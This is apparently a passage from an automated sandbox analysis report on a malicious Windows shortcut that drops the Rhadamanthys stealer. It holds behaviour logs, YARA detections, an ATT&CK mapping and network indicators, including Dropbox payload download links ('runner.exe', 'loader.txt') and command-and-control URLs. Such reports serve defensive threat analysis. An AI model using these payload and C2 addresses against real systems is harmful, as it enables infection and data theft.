                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041C260 GetSystemTimeAsFileTime,SHFormatDateTimeW,22_2_0041C260
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00419FF0 GetVersion,EnumWindows,IsWindow,SetForegroundWindow,SendMessageW,SendMessageW,SendMessageW,InitCommonControlsEx,CreateSolidBrush,EnumWindows,IsWindow,SetForegroundWindow,EnumWindows,IsWindow,SendMessageW,24_2_00419FF0
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Procmon.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2648884765.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2648884765.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		21
                    Input Capture                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory2
                    File and Directory Discovery                    		Remote Desktop Protocol21
                    Input Capture                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Windows Service                    		3
                    Obfuscated Files or Information                    		Security Account Manager136
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		1
                    Registry Run Keys / Startup Folder                    		111
                    Process Injection                    		1
                    DLL Side-Loading                    		NTDS351
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell                    		Network Logon Script1
                    Registry Run Keys / Startup Folder                    		11
                    Masquerading                    		LSA Secrets11
                    Process Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials41
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation                    		DCSync11
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572661 Sample: qxjDerXRGR.lnk Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 83 ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com 2->83 85 uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com 2->85 87 7 other IPs or domains 2->87 111 Suricata IDS alerts for network traffic 2->111 113 Windows shortcut file (LNK) starts blacklisted processes 2->113 115 Multi AV Scanner detection for submitted file 2->115 117 7 other signatures 2->117 14 cmd.exe 1 2->14         started        17 msedge.exe 65 421 2->17         started        20 svchost.exe 1 2 2->20         started        signatures3 process4 dnsIp5 133 Windows shortcut file (LNK) starts blacklisted processes 14->133 135 Suspicious powershell command line found 14->135 137 PowerShell case anomaly found 14->137 22 powershell.exe 14 28 14->22         started        27 conhost.exe 1 14->27         started        75 192.168.2.5, 443, 49703, 49704 unknown unknown 17->75 77 192.168.2.4 unknown unknown 17->77 81 2 other IPs or domains 17->81 29 msedge.exe 17->29         started        31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        35 3 other processes 17->35 79 127.0.0.1 unknown unknown 20->79 signatures6 process7 dnsIp8 89 162.125.65.15, 443, 49712 DROPBOXUS United States 22->89 91 www-env.dropbox-dns.com 162.125.65.18, 443, 49705, 49709 DROPBOXUS United States 22->91 97 2 other IPs or domains 22->97 71 C:\Users\user\AppData\Local\...\399226976.bat, DOS 22->71 dropped 123 Windows shortcut file (LNK) starts blacklisted processes 22->123 125 Loading BitLocker PowerShell Module 22->125 127 Powershell drops PE file 22->127 37 cmd.exe 22->37         started        40 msedge.exe 10 22->40         started        93 uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com 29->93 95 googlehosted.l.googleusercontent.com 172.217.19.225, 443, 49735 GOOGLEUS United States 29->95 99 7 other IPs or domains 29->99 file9 signatures10 process11 signatures12 119 Windows shortcut file (LNK) starts blacklisted processes 37->119 121 Suspicious powershell command line found 37->121 42 powershell.exe 37->42         started        45 conhost.exe 37->45         started        47 msedge.exe 40->47         started        process13 file14 73 C:\Users\user\AppData\Local\...\111392827.exe, PE32 42->73 dropped 49 111392827.exe 42->49         started        53 msedge.exe 42->53         started        process15 file16 69 C:\Users\user\...\PerfectouinVans.exe, PE32 49->69 dropped 103 Multi AV Scanner detection for dropped file 49->103 105 Drops PE files to the document folder of the user 49->105 107 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 49->107 109 3 other signatures 49->109 55 111392827.exe 49->55         started        57 msedge.exe 53->57         started        signatures17 process18 process19 59 fontdrvhost.exe 55->59         started        63 WerFault.exe 55->63         started        dnsIp20 101 162.213.210.250, 49891, 6499 IOFLOODUS United States 59->101 129 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 59->129 131 Switches to a custom stack to bypass stack traces 59->131 65 fontdrvhost.exe 59->65         started        signatures21 process22 process23 67 WerFault.exe 65->67         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    qxjDerXRGR.lnk21%ReversingLabsWin32.Trojan.Pantera
                    qxjDerXRGR.lnk100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\111392827.exe26%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa80%Avira URL Cloudsafe
                    https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com/cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb0%Avira URL Cloudsafe
                    https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl30%Avira URL Cloudsafe
                    https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=10%Avira URL Cloudsafe
                    https://uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com/cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=10%Avira URL Cloudsafe
                    https://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com/cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy0%Avira URL Cloudsafe
                    https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65ge0%Avira URL Cloudsafe
                    http://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://.AppV.0%Avira URL Cloudsafe
                    https://permanently-removed.invalid/LogoutYxAB0%Avira URL Cloudsafe
                    http://www.microsoft.coX0%Avira URL Cloudsafe
                    https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=10%Avira URL Cloudsafe
                    https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    fg.microsoft.map.fastly.net
                    		199.232.210.172
                    		truefalse
                      		high
                      7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      		3.125.209.94
                      		truefalse
                        		high
                        chrome.cloudflare-dns.com
                        		162.159.61.3
                        		truefalse
                          		high
                          edge-block-www-env.dropbox-dns.com
                          		162.125.69.15
                          		truefalse
                            		high
                            www-env.dropbox-dns.com
                            		162.125.65.18
                            		truefalse
                              		high
                              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                              		94.245.104.56
                              		truefalse
                                		high
                                googlehosted.l.googleusercontent.com
                                		172.217.19.225
                                		truefalse
                                  		high
                                  clients2.googleusercontent.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    bzib.nelreports.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.dropbox.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1false
                                                    		high
                                                    https://www.dropbox.com/scl/fi/0hdi5yqluk704whzcrld6/loader.txt?rlkey=b3m23z6tgb7mwwfbcjqi9kumq&dl=1false
                                                      		high
                                                      https://www.dropbox.com/scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1false
                                                        		high
